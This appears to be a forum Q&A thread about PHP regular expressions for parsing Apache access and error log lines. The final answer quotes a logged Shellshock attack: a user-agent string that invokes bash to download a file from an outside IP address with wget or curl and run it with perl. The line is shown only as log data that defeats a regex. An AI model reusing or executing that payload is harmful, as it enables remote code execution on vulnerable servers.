31

I need to save data in a table (for reporting, stats etc...) so a user can search by time, user agent etc. I have a script that runs every day that reads the Apache Log and then insert it in the database.

Log format:

10.1.1.150 - - [29/September/2011:14:21:49 -0400] "GET /info/ HTTP/1.1" 200 9955 "http://www.domain.com/download/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; de-at) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1"

My regex:

preg_match('/^(\S+) (\S+) (\S+) \[([^:]+):(\d+:\d+:\d+) ([^\]]+)\] \"(\S+) (.*?) (\S+)\" (\S+) (\S+) (\".*?\") (\".*?\")$/',$log, $matches);

Now when I print:

print_r($matches);

Array
(
    [0] => 10.1.1.150 - - [29/September/2011:14:21:49 -0400] "GET /info/ HTTP/1.1" 200 9955 "http://www.domain.com/download/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; de-at) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1"
    [1] => 10.1.1.150
    [2] => -
    [3] => -
    [4] => 29/September/2011
    [5] => 14:21:49
    [6] => -0400
    [7] => GET
    [8] => /info/
    [9] => HTTP/1.1
    [10] => 200
    [11] => 9955
    [12] => "http://www.domain.com/download/"
    [13] => "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; de-at) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1"
)

I get: "http://www.domain.com/download/" and same for user agent. How can I get rid of these " in the regex? Bonus (Is there any quick way to insert the date/time easily)?

Thanks

3
  • This is a duplicate of question #2221636 Commented Nov 17, 2011 at 18:27
  • I've written a simple helper class for this. See github.com/Spudley/ApacheLogIterator Commented Aug 17, 2012 at 12:38
  • @SDC: Thanks Simon, that iterator is awesome! Commented Sep 12, 2014 at 8:18

5 Answers 5

47

To parse an Apache access_log log in PHP you can use this regex:

$regex = '/^(\S+) (\S+) (\S+) \[([^:]+):(\d+:\d+:\d+) ([^\]]+)\] \"(\S+) (.*?) (\S+)\" (\S+) (\S+) "([^"]*)" "([^"]*)"$/';
preg_match($regex ,$log, $matches);

To match the Apache error_log format, you can use this regex:

$regex = '/^\[([^\]]+)\] \[([^\]]+)\] (?:\[client ([^\]]+)\])?\s*(.*)$/i';
preg_match($regex, $log, $matches);
$matches[1] = Date and time,           $matches[2] = severity,
$matches[3] = client addr (if present) $matches[4] = log message

It matches lines with or without the client:

[Tue Feb 28 11:42:31 2012] [notice] Apache/2.4.1 (Unix) mod_ssl/2.4.1 OpenSSL/0.9.8k PHP/5.3.10 configured -- resuming normal operations
[Tue Feb 28 14:34:41 2012] [error] [client 192.168.50.10] Symbolic link not allowed or link target not accessible: /usr/local/apache2/htdocs/x.js
Sign up to request clarification or add additional context in comments.

2 Comments

Just a heads up, your regex failes for misconfigured user agents such as \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.50 Safari/537.36\" Yes, someone forgott to properly set their own user agent.
Using "(.*?)" as the last capture group and removing the end of line matching character $ avoids the mentioned hickup above.
3

If you don't want to capture the double quotes, move them out of the capture groups.

 (\".*?\") 

Should become:

 \"(.*?)\"

As alternative you could just post-process the entries with trim($str, '"')

Comments

3

As I've seen and done so many errneous log parsing, here is a hopefully valid regex, tested on 50k lines of logs without any single diff, knowing that:

  • auth_user can have spaces
  • response_size can be -
  • http_start_line can at least one space (HTTP/0.9) or two
  • http_start_line may contain double quotes
  • referrer can be empty, have spaces, or double quotes (it's just an HTTP header)
  • user_agent can be empty too, or contain double quotes, and spaces
  • It's hard to distinguish between referrer and user-agent, let's just home the " " between both is discriminent enough, yet we can find the infamous " " in the referrer and in the user-agent, so basically, we're screwed here.

    $ncsa_re = '/^(?P<IP>\S+)
    \ (?P<ident>\S)
    \ (?P<auth_user>.*?) # Spaces are allowed here, can be empty.
    \ (?P<date>\[[^]]+\])
    \ "(?P<http_start_line>.+ .+)" # At least one space: HTTP 0.9
    \ (?P<status_code>[0-9]+) # Status code is _always_ an integer
    \ (?P<response_size>(?:[0-9]+|-)) # Response size can be -
    \ "(?P<referrer>.*)" # Referrer can contains everything: its just a header
    \ "(?P<user_agent>.*)"$/x';
    

Hope that's help.

2 Comments

What is the ?P in your regex? I haven't found anything that uses regex that recognizes that, it just gets flagged as an error.
@mutatron it's a named capture. Search for "named group" or "named capture group".
1

your regexp are wrong. you shoudl use correct regexp

/^(\S+) (\S+) (\S+) - \[([^:]+):(\d+:\d+:\d+) ([^\]]+)\] \"(\S+) (.*?) (\S+)\" (\S+) (\S+) "([^"]*)" "([^"]*)"$/

3 Comments

Could you expand on where and why was it wrong? (This will help ensure the same mistake isn't repeated in the future) :)
I second. No explination included as to why regex is wrong.
Moreover, it doesn't match on a standard Apache log line. Ignore this one.
0

I've tried using a couple of the regexps here Jan 2015, and find that a bad bot is not getting a match in my apache2 log.

The bad bot apache2 line is a BASH hack attempt, and I haven't tried to figure out the regexp correction yet:

199.217.117.211 - - [18/Jan/2015:10:52:27 -0500] "GET /cgi-bin/help.cgi HTTP/1.0" 404 498 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://185.28.190.69/mc;curl -O http://185.28.190.69/mc;perl mc;perl /tmp/mc\""

Comments

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.